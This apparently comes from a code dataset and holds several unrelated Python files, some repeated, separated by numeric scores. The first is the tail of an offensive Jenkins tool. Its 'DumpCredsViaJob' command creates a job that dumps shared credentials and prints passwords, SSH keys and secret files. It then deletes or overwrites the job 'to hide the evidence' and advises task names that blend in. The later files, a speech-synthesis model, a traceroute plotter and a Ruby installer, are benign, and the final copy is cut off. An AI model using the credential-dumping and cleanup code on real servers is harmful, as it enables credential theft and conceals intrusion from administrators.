"job/" + self.args.task_name + "/", "lastBuild"
)
state += 1
"""
Step 9: Parse Results
"""
# Normalize extract base64 encoded credentials:
try:
result = "\n".join(x for x in result.split("\n") if not x.startswith("+ "))
result = (
re.findall(
r"-----BEGIN CERTIFICATE-----(.*?)-----END CERTIFICATE-----",
result,
re.M | re.S,
)[0]
.replace("\r", "")
.replace("\n", "")
)
result = base64.b64decode(result).decode("utf8")
except Exception:
raise NonCriticalException("Unable to parse out credentials from job.")
result = re.split(re.escape(barrier), result, re.M)[1:]
for i, raw_cred in enumerate(result):
raw_cred = raw_cred.replace("\r", "\n").replace("\n\n", "\n")
raw_cred = re.split(r"[\r\n]", raw_cred, re.M)[1:]
try:
if raw_cred[0].strip() == "PASSWORD":
cred_type = raw_cred[0].strip()
description = raw_cred[1].strip()
username = raw_cred[2].split(":")[0].strip()
password = ":".join(raw_cred[2].split(":")[1:]).strip()
print("Type:", cred_type)
print("Description:", description)
print("Username:", username)
print("Password:", password)
elif raw_cred[0].strip() == "SSHKEY":
cred_type = raw_cred[0].strip()
description = raw_cred[1].strip()
username = raw_cred[2].strip()
passphrase = raw_cred[3].strip()
key = "\n".join(raw_cred[4:]).strip()
print("Type:", cred_type)
print("Description:", description)
print("Username:", username)
print("Passphrase:", passphrase)
print("Key:")
print(key)
elif raw_cred[0].strip() == "SECRETTEXT":
cred_type = raw_cred[0].strip()
description = raw_cred[1].strip()
text = raw_cred[2].strip()
print("Type:", cred_type)
print("Description:", description)
print("Text:", text)
elif raw_cred[0].strip() == "SECRETFILE":
if (
raw_cred[2] == ""
): # Delete blank line if it exists at top of file which was introduced by regex splitting
del raw_cred[2]
cred_type = raw_cred[0].strip()
description = raw_cred[1].strip()
file_content = "\n".join(raw_cred[2:]).strip()
print("Type:", cred_type)
print("Description:", description)
print("Content:")
print(file_content)
except Exception:
pass
if i < (len(result) - 1):
print(
"-----------------------------------------------------------------------------"
)
except jenkinslib.JenkinsException as ex:
if "[403]" in str(ex).split("\n")[0]:
self.logging.fatal(
"%s authentication failed or no access", self._get_username(cred)
)
else:
self.logging.fatal(
"Unable to access Jenkins at: %s With User: %s For Reason:\n\t%s"
% (
(
self.server_url.netloc
if len(self.server_url.netloc) > 0
else self.args.server
),
self._get_username(cred),
str(ex).split("\n")[0],
)
)
except (req_exc.SSLError, req_exc.ConnectionError):
self.logging.fatal(
"Unable to connect to: "
+ (self.server_url.netloc if len(self.server_url.netloc) > 0 else self.args.server)
)
except NonCriticalException as ex:
with HijackStdOut():
print(str(ex))
except Exception:
self.logging.exception("")
exit(1)
finally:
# Do Cleanup
if state > 1:
try:
server.delete_job(self.args.task_name)
return
except (
jenkinslib.JenkinsException,
req_exc.SSLError,
req_exc.ConnectionError,
req_exc.HTTPError,
):
with HijackStdOut():
print(
"WARNING: Unable to delete the job, attempting secondary clean-up. You should double check."
)
# We were unable to delete the the task, so we need to do secondary clean-up as best we can:
# First we delete all console output and run history:
try:
server.delete_all_job_builds(self.args.task_name)
except (
jenkinslib.JenkinsException,
req_exc.SSLError,
req_exc.ConnectionError,
req_exc.HTTPError,
):
print(
"WARNING: Unable to clean-up console output. You should definitely try to do this yourself."
)
# Second, overwrite the job with an empty job:
try:
server.reconfig_job(
self.args.task_name,
"<?xml version='1.1' encoding='UTF-8'?><project></project>",
)
except (
jenkinslib.JenkinsException,
req_exc.SSLError,
req_exc.ConnectionError,
req_exc.HTTPError,
):
print(
"WARNING: Unable to wipeout job to hide the evidence. You should definitely try to do this yourself."
)
# Third, attempt to disable the job:
try:
server.disable_job(self.args.task_name)
except (
jenkinslib.JenkinsException,
req_exc.SSLError,
req_exc.ConnectionError,
req_exc.HTTPError,
):
print(
"WARNING: Unable to disable job. You should definitely try to do this yourself."
)
def _generate_job_xml(self, job_type, nodes, barrier, credentials):
file_name = "f" + "".join(random.choices(string.ascii_letters + string.digits, k=8))
loader = quik.FileLoader(os.path.join("data", "xml"))
bindings_template = loader.load_template("credential_binding_template.xml")
job_template = loader.load_template("job_template.xml")
if job_type == "posix":
cmd_template = quik.FileLoader(os.path.join("data", "bash")).load_template(
"posix_job_dump_creds_template.sh"
)
else:
cmd_template = quik.FileLoader(os.path.join("data", "batch")).load_template(
"windows_job_dump_creds_template.bat"
)
for i in range(len(credentials)):
if credentials[i]["type"] == "SSHKEY":
credentials[i]["key_file_variable"] = "a{0}k".format(i)
credentials[i]["username_variable"] = "a{0}u".format(i)
credentials[i]["passphrase_variable"] = "a{0}p".format(i)
else: # For now everything else uses only one variable
credentials[i]["variable"] = "a{0}".format(i)
bindings = bindings_template.render(locals())
cmds = cmd_template.render(locals())
return job_template.render(
{
"job_type": "BatchFile" if job_type == "windows" else "Shell",
"assigned_nodes": "({})".format(
xmlescape(" || ".join(['"{}"'.format(x["name"]) for x in nodes]))
),
"commands": xmlescape(cmds),
"credential_bindings": bindings,
}
)
class DumpCredsViaJobParser:
def cmd_DumpCredsViaJob(self):
"""Handles parsing of RunCommand Subcommand arguments"""
self._create_contextual_parser(
"DumpCredsViaJob",
"Dump credentials via explicit enumeration of shared credentials in a job (Only requires job creation permissions and some shared credentials)",
)
self._add_common_arg_parsers()
self.parser.add_argument(
"-N",
"--node",
metavar="<Node>",
help="Node to execute against. If specified, you must also pass -T",
action="store",
dest="node",
required=False,
)
self.parser.add_argument(
"-T",
"--nodetype",
metavar="<Node Type>",
help='Node Type, either: "posix" or "windows". If specified, you must also pass -N',
choices=["posix", "windows"],
dest="node_type",
required=False,
)
self.parser.add_argument(
metavar="<Task Name>",
help="Task to Create, must be unique (may not be deleted if user doesn't have job deletion permissions, so pick something that blends in)",
action="store",
dest="task_name",
)
args = self.parser.parse_args()
self._validate_server_url(args)
self._validate_output_file(args)
if not args.task_name or any(
x not in (string.ascii_letters + string.digits + "/") for x in args.task_name
):
with HijackStdOut():
self.parser.print_usage()
print(
"\nError: Task Name must be alphanumeric string with optional subfolder pathing via forward slashes."
)
exit(1)
if (args.node and not args.node_type) or (args.node_type and not args.node):
with HijackStdOut():
self.parser.print_usage()
print("\nError: You must either specify both Node and Node Type or neither")
exit(1)
return self._handle_authentication(args) | 0.294925 | 0.215258 |
import os
import json
import torch
import torch.nn as nn
import torch.nn.functional as F
from .modules import (
TextEncoder,
DurationPredictor,
RangeParameterPredictor,
GaussianUpsampling,
SamplingWindow,
)
from wavegrad import WaveGrad
from utils.tools import get_mask_from_lengths
class WaveGrad2(nn.Module):
""" WaveGrad2 """
def __init__(self, preprocess_config, model_config, train_config):
super(WaveGrad2, self).__init__()
self.model_config = model_config
self.encoder = TextEncoder(model_config)
self.duration_predictor = DurationPredictor(model_config)
self.range_param_predictor = RangeParameterPredictor(model_config)
self.gaussian_upsampling = GaussianUpsampling(model_config)
self.sampling_window = SamplingWindow(model_config, train_config)
self.decoder = WaveGrad(preprocess_config, model_config)
self.speaker_emb = None
if model_config["multi_speaker"]:
with open(
os.path.join(
preprocess_config["path"]["preprocessed_path"], "speakers.json"
),
"r",
) as f:
n_speaker = len(json.load(f))
self.speaker_emb = nn.Embedding(
n_speaker,
model_config["transformer"]["encoder_hidden"],
)
self.encoder_seg = self.audio_seg = None
def forward(
self,
speakers,
texts,
src_lens,
max_src_len,
audios,
d_targets,
seq_starts,
phones,
):
# Text Encoding
src_masks = get_mask_from_lengths(src_lens, max_src_len)
output = self.encoder(texts, src_lens, src_masks)
if self.speaker_emb is not None:
output = output + self.speaker_emb(speakers).unsqueeze(1).expand(
-1, max_src_len, -1
)
# Resampling
log_d_predictions = self.duration_predictor(output, src_lens, src_masks)
range_param = self.range_param_predictor(output, src_lens, d_targets, src_masks)
output, attns = self.gaussian_upsampling(output, d_targets, range_param, src_masks)
d_rounded = d_targets
# Sampling Window
encoder_seg, audio_seg = self.sampling_window(output, audios, seq_starts)
self.encoder_seg, self.audio_seg = encoder_seg, audio_seg # Save for sampling
# Compute Noise Loss
noise_loss = self.decoder.compute_loss(encoder_seg.transpose(-2, -1), audio_seg)
return (
noise_loss,
log_d_predictions,
d_rounded,
src_masks,
src_lens,
attns,
)
def inference(
self,
speakers,
texts,
src_lens,
max_src_len,
d_control=1.0,
):
# Text Encoding
src_masks = get_mask_from_lengths(src_lens, max_src_len)
output = self.encoder.inference(texts, src_masks)
if self.speaker_emb is not None:
output = output + self.speaker_emb(speakers).unsqueeze(1).expand(
-1, max_src_len, -1
)
# Resampling
log_d_predictions = self.duration_predictor.inference(output)
d_rounded = torch.clamp(
(torch.round(torch.exp(log_d_predictions) - 1) * d_control),
min=0,
)
range_param = self.range_param_predictor.inference(output, d_rounded)
output, attns = self.gaussian_upsampling(output, d_rounded, range_param, src_masks)
# Decoding
output = self.decoder.forward(
output.transpose(-2, -1), store_intermediate_states=False
)
return output | model/WaveGrad2.py | import os
import json
import torch
import torch.nn as nn
import torch.nn.functional as F
from .modules import (
TextEncoder,
DurationPredictor,
RangeParameterPredictor,
GaussianUpsampling,
SamplingWindow,
)
from wavegrad import WaveGrad
from utils.tools import get_mask_from_lengths
class WaveGrad2(nn.Module):
""" WaveGrad2 """
def __init__(self, preprocess_config, model_config, train_config):
super(WaveGrad2, self).__init__()
self.model_config = model_config
self.encoder = TextEncoder(model_config)
self.duration_predictor = DurationPredictor(model_config)
self.range_param_predictor = RangeParameterPredictor(model_config)
self.gaussian_upsampling = GaussianUpsampling(model_config)
self.sampling_window = SamplingWindow(model_config, train_config)
self.decoder = WaveGrad(preprocess_config, model_config)
self.speaker_emb = None
if model_config["multi_speaker"]:
with open(
os.path.join(
preprocess_config["path"]["preprocessed_path"], "speakers.json"
),
"r",
) as f:
n_speaker = len(json.load(f))
self.speaker_emb = nn.Embedding(
n_speaker,
model_config["transformer"]["encoder_hidden"],
)
self.encoder_seg = self.audio_seg = None
def forward(
self,
speakers,
texts,
src_lens,
max_src_len,
audios,
d_targets,
seq_starts,
phones,
):
# Text Encoding
src_masks = get_mask_from_lengths(src_lens, max_src_len)
output = self.encoder(texts, src_lens, src_masks)
if self.speaker_emb is not None:
output = output + self.speaker_emb(speakers).unsqueeze(1).expand(
-1, max_src_len, -1
)
# Resampling
log_d_predictions = self.duration_predictor(output, src_lens, src_masks)
range_param = self.range_param_predictor(output, src_lens, d_targets, src_masks)
output, attns = self.gaussian_upsampling(output, d_targets, range_param, src_masks)
d_rounded = d_targets
# Sampling Window
encoder_seg, audio_seg = self.sampling_window(output, audios, seq_starts)
self.encoder_seg, self.audio_seg = encoder_seg, audio_seg # Save for sampling
# Compute Noise Loss
noise_loss = self.decoder.compute_loss(encoder_seg.transpose(-2, -1), audio_seg)
return (
noise_loss,
log_d_predictions,
d_rounded,
src_masks,
src_lens,
attns,
)
def inference(
self,
speakers,
texts,
src_lens,
max_src_len,
d_control=1.0,
):
# Text Encoding
src_masks = get_mask_from_lengths(src_lens, max_src_len)
output = self.encoder.inference(texts, src_masks)
if self.speaker_emb is not None:
output = output + self.speaker_emb(speakers).unsqueeze(1).expand(
-1, max_src_len, -1
)
# Resampling
log_d_predictions = self.duration_predictor.inference(output)
d_rounded = torch.clamp(
(torch.round(torch.exp(log_d_predictions) - 1) * d_control),
min=0,
)
range_param = self.range_param_predictor.inference(output, d_rounded)
output, attns = self.gaussian_upsampling(output, d_rounded, range_param, src_masks)
# Decoding
output = self.decoder.forward(
output.transpose(-2, -1), store_intermediate_states=False
)
return output | 0.824603 | 0.114023 |
import ipaddress
import json
import logging
import math
import os
import socket
import urllib.request
from typing import Optional, Tuple, Dict, Set
import plotly.graph_objects as go
from scapy.layers.inet import traceroute
from scapy.layers.inet6 import traceroute6
marker_size = 10
max_ttl_traceroute = 32
cache_name = "ip_lat_lon_cache.csv"
class Trace:
def __init__(self):
self.ip_locations: Dict[str, Tuple[float, float]] = {}
self.blacklisted_ips: Set[str] = set()
def read_from_file(self) -> None:
if os.path.exists(cache_name):
try:
with open(cache_name, 'r') as cache:
cache.readline() # header
for line in cache.readlines():
ip, lat, lon = line.split(',')
self.ip_locations[ip] = float(lat), float(lon)
except Exception as e:
logging.error(f'Unable to load cache: {e}')
def write_to_file(self) -> None:
try:
with open(cache_name, 'w') as cache:
cache.write('ip,latitude,longitude\n')
for ip, (lat, lon) in self.ip_locations.items():
cache.write(f'{ip}, {lat}, {lon}\n')
except Exception as e:
logging.error(f'Unable to write to cache: {e}')
def get_lat_lon(self, ip_addr: str) -> Optional[Tuple[float, float]]:
if ip_addr in self.blacklisted_ips:
return None
elif ip_addr in self.ip_locations:
return self.ip_locations[ip_addr]
try:
with urllib.request.urlopen(f'https://geolocation-db.com/json/{ip_addr}') as url:
json_data = json.loads(url.read().decode())
if 'latitude' not in json_data or 'longitude' not in json_data:
self.blacklisted_ips.add(ip_addr)
return None
lat, lon = json_data['latitude'], json_data['longitude']
if lat == 'Not found' or lon == 'Not found' or lat is None or lon is None:
self.blacklisted_ips.add(ip_addr)
return None
else:
self.ip_locations[ip_addr] = lat, lon
return lat, lon
except Exception as e:
logging.warning(f'Unable to determine location of {ip_addr}: {e}')
return None
def trace(self, ip: str, hits: int, byte_count: int, timeout: int, display_name: bool) -> go.Scattergeo:
if isinstance(ipaddress.ip_address(ip), ipaddress.IPv6Address):
ans, err = traceroute6(ip, maxttl=max_ttl_traceroute, dport=53, verbose=False, timeout=timeout)
else:
ans, err = traceroute(ip, maxttl=max_ttl_traceroute, dport=53, verbose=False, timeout=timeout)
lats, lons, text, received = [], [], [], set()
msg = f'Route to {ip}: '
count = 1
for sent_ip, received_ip in ans.res:
res = self.get_lat_lon(received_ip.src)
if res is not None:
lat, lon = res[0], res[1]
lats += [lat]
lons += [lon]
text += [f'hop {count}: {received_ip.src if display_name else ""}']
msg += f'{sent_ip.dst} [{lat}, {lon}], '
received.add(received_ip.src)
count += 1
if ip not in received:
res = self.get_lat_lon(ip)
if res is not None:
lat, lon = res[0], res[1]
lats += [lat]
lons += [lon]
text += [f'hop {count}: {ip}']
logging.info(msg)
mode = 'markers' if len(lats) == 1 else 'markers+lines'
if display_name:
try:
name, _, _ = socket.gethostbyaddr(ip)
host_addr = f'{name} | '
except Exception as e:
logging.warning(f'Failed to get hostname of {ip}: {e}')
host_addr = ''
name = f'{host_addr} {ip}<br>'
else:
name = ''
return go.Scattergeo(mode=mode, lon=lons, lat=lats, text=text,
name=f'{name}{hits} packets, {byte_count} bytes',
line={'width': int(math.log(byte_count)) / 2},
marker={'size': marker_size, 'symbol': 'square'}) | sniff_and_trace/trace.py | import ipaddress
import json
import logging
import math
import os
import socket
import urllib.request
from typing import Optional, Tuple, Dict, Set
import plotly.graph_objects as go
from scapy.layers.inet import traceroute
from scapy.layers.inet6 import traceroute6
marker_size = 10
max_ttl_traceroute = 32
cache_name = "ip_lat_lon_cache.csv"
class Trace:
def __init__(self):
self.ip_locations: Dict[str, Tuple[float, float]] = {}
self.blacklisted_ips: Set[str] = set()
def read_from_file(self) -> None:
if os.path.exists(cache_name):
try:
with open(cache_name, 'r') as cache:
cache.readline() # header
for line in cache.readlines():
ip, lat, lon = line.split(',')
self.ip_locations[ip] = float(lat), float(lon)
except Exception as e:
logging.error(f'Unable to load cache: {e}')
def write_to_file(self) -> None:
try:
with open(cache_name, 'w') as cache:
cache.write('ip,latitude,longitude\n')
for ip, (lat, lon) in self.ip_locations.items():
cache.write(f'{ip}, {lat}, {lon}\n')
except Exception as e:
logging.error(f'Unable to write to cache: {e}')
def get_lat_lon(self, ip_addr: str) -> Optional[Tuple[float, float]]:
if ip_addr in self.blacklisted_ips:
return None
elif ip_addr in self.ip_locations:
return self.ip_locations[ip_addr]
try:
with urllib.request.urlopen(f'https://geolocation-db.com/json/{ip_addr}') as url:
json_data = json.loads(url.read().decode())
if 'latitude' not in json_data or 'longitude' not in json_data:
self.blacklisted_ips.add(ip_addr)
return None
lat, lon = json_data['latitude'], json_data['longitude']
if lat == 'Not found' or lon == 'Not found' or lat is None or lon is None:
self.blacklisted_ips.add(ip_addr)
return None
else:
self.ip_locations[ip_addr] = lat, lon
return lat, lon
except Exception as e:
logging.warning(f'Unable to determine location of {ip_addr}: {e}')
return None
def trace(self, ip: str, hits: int, byte_count: int, timeout: int, display_name: bool) -> go.Scattergeo:
if isinstance(ipaddress.ip_address(ip), ipaddress.IPv6Address):
ans, err = traceroute6(ip, maxttl=max_ttl_traceroute, dport=53, verbose=False, timeout=timeout)
else:
ans, err = traceroute(ip, maxttl=max_ttl_traceroute, dport=53, verbose=False, timeout=timeout)
lats, lons, text, received = [], [], [], set()
msg = f'Route to {ip}: '
count = 1
for sent_ip, received_ip in ans.res:
res = self.get_lat_lon(received_ip.src)
if res is not None:
lat, lon = res[0], res[1]
lats += [lat]
lons += [lon]
text += [f'hop {count}: {received_ip.src if display_name else ""}']
msg += f'{sent_ip.dst} [{lat}, {lon}], '
received.add(received_ip.src)
count += 1
if ip not in received:
res = self.get_lat_lon(ip)
if res is not None:
lat, lon = res[0], res[1]
lats += [lat]
lons += [lon]
text += [f'hop {count}: {ip}']
logging.info(msg)
mode = 'markers' if len(lats) == 1 else 'markers+lines'
if display_name:
try:
name, _, _ = socket.gethostbyaddr(ip)
host_addr = f'{name} | '
except Exception as e:
logging.warning(f'Failed to get hostname of {ip}: {e}')
host_addr = ''
name = f'{host_addr} {ip}<br>'
else:
name = ''
return go.Scattergeo(mode=mode, lon=lons, lat=lats, text=text,
name=f'{name}{hits} packets, {byte_count} bytes',
line={'width': int(math.log(byte_count)) / 2},
marker={'size': marker_size, 'symbol': 'square'}) | 0.70619 | 0.160266 |
from ..runtimetool import RuntimeTool
from .bashtoolmixin import BashToolMixIn
from .rvmtool import rvmTool
class rubyTool(BashToolMixIn, RuntimeTool):
"""Ruby is a dynamic, open source programming language.
Home: https://www.ruby-lang.org/en/
By default the latest available Ruby binary is used for the following OSes:
* Debian & Ubuntu - uses Brightbox builds 1.9, 2.0, 2.1, 2.2, 2.3, 2.4.
* CentOS, RHEL & Oracle Linux - uses SCL 1.9, 2.0, 2.2, 2.3
You can forbid source builds by setting rubyBinOnly to non-empty string.
Otherwise, System Ruby is used by default.
If rubyVer is set then RVM is used to setup custom rubies.
That may lead to long time and resource consumption due to compilation,
if binary versions are not found for specific system.
Note: RUBY_ENV and RAILS_ENV are set based on rubyEnv or .env.type
"""
__slots__ = ()
def getDeps(self):
return ['rvm']
def _installTool(self, env):
rvmTool('rvm').ensureGpgKeys(env)
if env['rubyFoundBinary']:
self._installBinaries(env)
return
self._buildDeps(env)
self._executil.callExternal([
env['rvmBin'], 'install', env['rubySourceVer'], '--autolibs=read-only'
])
self._executil.callExternal([
env['rvmBin'], 'cleanup', 'all'
])
def _installBinaries(self, env):
detect = self._detect
install = self._install
pathutil = self._pathutil
executil = self._executil
ver = env['rubyVer']
rvm_ruby_ver = 'system-{0}'.format(ver)
pkgver = ver
if detect.isDebian() or detect.isUbuntu():
code_name = self._detect.osCodeName()
if code_name in ['stretch']:
install.aptRepo('jessie-ssl10bp',
'deb http://deb.debian.org/debian jessie-backports main')
repo = env['rubyBrightboxRepo']
install.aptRepo(
'brightbox-ruby',
"deb {0} $codename$ main".format(repo),
self._GPG_BIRGHTBOX_REPO,
codename_map={
# Ubuntu
# Debian
'jessie': 'trusty',
'stretch': 'xenial',
'buster': 'bionic',
'testing': 'bionic',
'sid': 'bionic',
},
repo_base='{0}/dists'.format(repo)
)
if ver == '1.9':
pkgver = '1.9.[0-9]'
if detect.isDebian():
UBUNTU_MIRROR = 'https://debian.charite.de/ubuntu'
pkg = UBUNTU_MIRROR + '/pool/main/r/readline6/libreadline6_6.3-8ubuntu2_amd64.deb'
install.dpkg(env, 'libreadline6', pkg)
pkg = UBUNTU_MIRROR + '/pool/main/g/gdbm/libgdbm5_1.14.1-6_amd64.deb'
install.dpkg(env, 'libgdbm5', pkg)
install.deb([
'ruby{0}'.format(pkgver),
'ruby{0}-dev'.format(pkgver),
])
ruby_bins = self._ext.glob.glob('/usr/bin/ruby{0}*'.format(ver))
if len(ruby_bins) == 0:
self._errorExit('No Ruby found for version {0}'.format(ver))
ruby_bin = ruby_bins[0]
elif detect.isSCLSupported():
sclname = self._rubySCLName(ver)
install.yumSCL()
install.yum(sclname)
# required for LD_LIBRARY_PATH
env_to_set = executil.callExternal(
['scl', 'enable', sclname, 'env'], verbose=False)
pathutil.updateEnvFromOutput(env_to_set)
ruby_bin = executil.callExternal(
['scl', 'enable', sclname, 'which ruby'], verbose=False).strip()
elif detect.isMacOS():
formula = 'ruby@{0}'.format(ver)
install.brew(formula)
return
else:
self._systemDeps()
rvm_ruby_ver = 'system'
ruby_bin = pathutil.which('ruby')
executil.callExternal([
env['rvmBin'], 'remove', 'ext-{0}'.format(rvm_ruby_ver)
], suppress_fail=True)
executil.callExternal([
env['rvmBin'], 'mount', ruby_bin, '-n', rvm_ruby_ver
])
def _rubySCLName(self, ver):
pkgver = ver.replace('.', '')
if pkgver == '19':
sclname = 'ruby193'
elif pkgver == '20':
sclname = 'ruby200'
else:
sclname = 'rh-ruby' + pkgver
return sclname
def _fixRvmLinks(self, env, name, ver):
ospath = self._ospath
os = self._os
glob = self._ext.glob
bin_dir = ospath.join(env['rvmDir'], 'rubies', name, 'bin')
for f in ['erb', 'gem', 'irb', 'rake', 'rdoc', 'ri', 'ruby', 'testrb']:
f = ospath.join(bin_dir, f)
res = glob.glob('{0}{1}*'.format(f, ver))
if res:
res = ospath.basename(res[0])
if os.readlink(f) == res:
continue
try:
os.unlink(f)
except Exception as e:
self._warn(str(e))
os.symlink(res, f)
def _updateTool(self, env):
if not env['rubyFoundBinary']:
self._installTool(env)
def uninstallTool(self, env):
ruby_ver = env['rubyVer']
if not env['rubyFoundBinary']:
self._executil.callExternal([
env['rvmBin'], 'uninstall', env['rubyVer']
])
self._have_tool = False
def envNames(self):
return ['rubyVer', 'rubyBin', 'rubyBinOnly', 'rubyForceBuild', 'rubySourceVer', 'rubyEnv']
def initEnv(self, env):
environ = self._environ
ospath = self._ospath
detect = self._detect
path = self._pathutil
# ---
ruby_env = env.get('rubyEnv', '')
if ruby_env:
pass
elif env['type'] == 'dev':
ruby_env = 'development'
else:
ruby_env = 'production'
environ['RUBY_ENV'] = ruby_env
environ['RAILS_ENV'] = ruby_env
# ---
if 'GEM_HOME' in environ:
path.delEnvPath('PATH', environ['GEM_HOME'])
path.delEnvPath('GEM_PATH', environ['GEM_HOME'])
del environ['GEM_HOME']
# ---
rubyForceBuild = env.setdefault('rubyForceBuild', False)
rubyBinOnly = env.setdefault('rubyBinOnly', not rubyForceBuild)
if rubyBinOnly and rubyForceBuild:
self._warn('"rubyBinOnly" and "rubyForceBuild" do not make sense'
' when set together!')
# ---
if detect.isDebian() or detect.isUbuntu():
bb_repo = 'http://ppa.launchpad.net/brightbox/ruby-ng/ubuntu'
ruby_binaries = ['1.9', '2.0', '2.1',
'2.2', '2.3', '2.4', '2.5', '2.6']
code_name = self._detect.osCodeName()
if code_name in []:
# 1.9 build is broken on LaunchPad
bb_repo = 'http://ppa.launchpad.net/brightbox/ruby-ng-experimental/ubuntu'
env.setdefault('rubyBrightboxRepo', bb_repo)
elif detect.isSCLSupported():
if detect.isCentOS():
ruby_binaries = ['1.9', '2.0', '2.2', '2.3', '2.4', '2.5']
else:
ruby_binaries = ['1.9', '2.0', '2.2', '2.3', '2.4', '2.5']
elif detect.isMacOS():
ruby_binaries = ['1.8', '1.9', '2.0',
'2.2', '2.3', '2.4', '2.5', '2.6']
else:
ruby_binaries = None
# ---
if ruby_binaries and not rubyForceBuild:
ruby_ver = env.setdefault('rubyVer', ruby_binaries[-1])
foundBinary = ruby_ver in ruby_binaries
rvm_ruby_ver = ruby_ver
if foundBinary:
rvm_ruby_ver = 'ext-system-{0}'.format(ruby_ver)
# required for LD_LIBRARY_PATH
if detect.isSCLSupported():
sclname = self._rubySCLName(ruby_ver)
try:
env_to_set = self._executil.callExternal(
['scl', 'enable', sclname, 'env'], verbose=False)
self._pathutil.updateEnvFromOutput(env_to_set)
except self._ext.subprocess.CalledProcessError:
pass
except OSError:
pass
elif detect.isMacOS():
env['rubyFoundBinary'] = True
formula = 'ruby@{0}'.format(ruby_ver)
brew_prefix = env['brewDir']
ruby_bin_dir = ospath.join(
brew_prefix, 'opt', formula, 'bin')
if ospath.exists(ruby_bin_dir):
self._pathutil.addBinPath(ruby_bin_dir, True)
super(rubyTool, self).initEnv(env)
self._environ['rubyVer'] = ruby_ver
return
elif detect.isDebian() or detect.isUbuntu():
self._fixRvmLinks(env, rvm_ruby_ver, ruby_ver)
else:
ruby_ver = env.setdefault('rubyVer', self.SYSTEM_VER)
foundBinary = ruby_ver == self.SYSTEM_VER
rvm_ruby_ver = foundBinary and ruby_ver or 'ext-system'
# ---
rvm_dir = env['rvmDir']
env['rubyFoundBinary'] = foundBinary
if rubyForceBuild or not foundBinary:
rvm_ruby_ver = env.setdefault('rubySourceVer', ruby_ver or 'ruby')
try:
env_to_set = self._callBash(env,
'source {0} && \
rvm use {1} >/dev/null && \
env | grep "rvm"'.format(env['rvmInit'], rvm_ruby_ver),
verbose=False
)
except:
return
if env_to_set:
self._pathutil.updateEnvFromOutput(env_to_set)
super(rubyTool, self).initEnv(env)
self._environ['rubyVer'] = ruby_ver
def _buildDeps(self, env):
self._builddep.require(env, 'ssl')
# APT
# ---
self._install.deb([
'build-essential',
'gawk',
'make',
'libc6-dev',
'zlib1g-dev',
'libyaml-dev',
'libsqlite3-dev',
'sqlite3',
'autoconf',
'libgmp-dev',
'libgdbm-dev',
'libncurses5-dev',
'automake',
'libtool',
'bison',
'pkg-config',
'libffi-dev',
'libgmp-dev',
'libreadline-dev',
])
# Extra repo before the rest
# ---
self._install.yumEPEL()
self._install.rpm([
'binutils',
'patch',
'libyaml-devel',
'autoconf',
'gcc',
'gcc-c++',
'glibc-devel',
'readline-devel',
'zlib-devel',
'libffi-devel',
'automake',
'libtool',
'bison',
'sqlite-devel',
'make',
'm4',
'gdbm-devel',
'sqlite3-devel',
])
# ---
self._install.emergeDepsOnly(['dev-lang/ruby'])
self._install.pacman(['ruby'])
self._install.apk('build-base')
def _systemDeps(self):
self._install.debrpm(['ruby'])
self._install.emerge(['dev-lang/ruby'])
self._install.pacman(['ruby'])
self._install.apk(['ruby',
'ruby-bigdecimal',
'ruby-libs',
'ruby-io-console',
'ruby-irb',
'ruby-json',
'ruby-minitest',
'ruby-net-telnet',
'ruby-power_assert',
'ruby-xmlrpc'
])
_GPG_BIRGHTBOX_REPO = '''
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: SKS 1.1.6
Comment: Hostname: keyserver.ubuntu.com
<KEY>
-----END PGP PUBLIC KEY BLOCK-----
'''
def tuneDefaults(self, env):
return {
'minMemory': '8M',
'socketType': 'none',
'scalable': False,
'reloadable': False,
'multiCore': True,
} | futoin/cid/tool/rubytool.py |
from ..runtimetool import RuntimeTool
from .bashtoolmixin import BashToolMixIn
from .rvmtool import rvmTool
class rubyTool(BashToolMixIn, RuntimeTool):
"""Ruby is a dynamic, open source programming language.
Home: https://www.ruby-lang.org/en/
By default the latest available Ruby binary is used for the following OSes:
* Debian & Ubuntu - uses Brightbox builds 1.9, 2.0, 2.1, 2.2, 2.3, 2.4.
* CentOS, RHEL & Oracle Linux - uses SCL 1.9, 2.0, 2.2, 2.3
You can forbid source builds by setting rubyBinOnly to non-empty string.
Otherwise, System Ruby is used by default.
If rubyVer is set then RVM is used to setup custom rubies.
That may lead to long time and resource consumption due to compilation,
if binary versions are not found for specific system.
Note: RUBY_ENV and RAILS_ENV are set based on rubyEnv or .env.type
"""
__slots__ = ()
def getDeps(self):
return ['rvm']
def _installTool(self, env):
rvmTool('rvm').ensureGpgKeys(env)
if env['rubyFoundBinary']:
self._installBinaries(env)
return
self._buildDeps(env)
self._executil.callExternal([
env['rvmBin'], 'install', env['rubySourceVer'], '--autolibs=read-only'
])
self._executil.callExternal([
env['rvmBin'], 'cleanup', 'all'
])
def _installBinaries(self, env):
detect = self._detect
install = self._install
pathutil = self._pathutil
executil = self._executil
ver = env['rubyVer']
rvm_ruby_ver = 'system-{0}'.format(ver)
pkgver = ver
if detect.isDebian() or detect.isUbuntu():
code_name = self._detect.osCodeName()
if code_name in ['stretch']:
install.aptRepo('jessie-ssl10bp',
'deb http://deb.debian.org/debian jessie-backports main')
repo = env['rubyBrightboxRepo']
install.aptRepo(
'brightbox-ruby',
"deb {0} $codename$ main".format(repo),
self._GPG_BIRGHTBOX_REPO,
codename_map={
# Ubuntu
# Debian
'jessie': 'trusty',
'stretch': 'xenial',
'buster': 'bionic',
'testing': 'bionic',
'sid': 'bionic',
},
repo_base='{0}/dists'.format(repo)
)
if ver == '1.9':
pkgver = '1.9.[0-9]'
if detect.isDebian():
UBUNTU_MIRROR = 'https://debian.charite.de/ubuntu'
pkg = UBUNTU_MIRROR + '/pool/main/r/readline6/libreadline6_6.3-8ubuntu2_amd64.deb'
install.dpkg(env, 'libreadline6', pkg)
pkg = UBUNTU_MIRROR + '/pool/main/g/gdbm/libgdbm5_1.14.1-6_amd64.deb'
install.dpkg(env, 'libgdbm5', pkg)
install.deb([
'ruby{0}'.format(pkgver),
'ruby{0}-dev'.format(pkgver),
])
ruby_bins = self._ext.glob.glob('/usr/bin/ruby{0}*'.format(ver))
if len(ruby_bins) == 0:
self._errorExit('No Ruby found for version {0}'.format(ver))
ruby_bin = ruby_bins[0]
elif detect.isSCLSupported():
sclname = self._rubySCLName(ver)
install.yumSCL()
install.yum(sclname)
# required for LD_LIBRARY_PATH
env_to_set = executil.callExternal(
['scl', 'enable', sclname, 'env'], verbose=False)
pathutil.updateEnvFromOutput(env_to_set)
ruby_bin = executil.callExternal(
['scl', 'enable', sclname, 'which ruby'], verbose=False).strip()
elif detect.isMacOS():
formula = 'ruby@{0}'.format(ver)
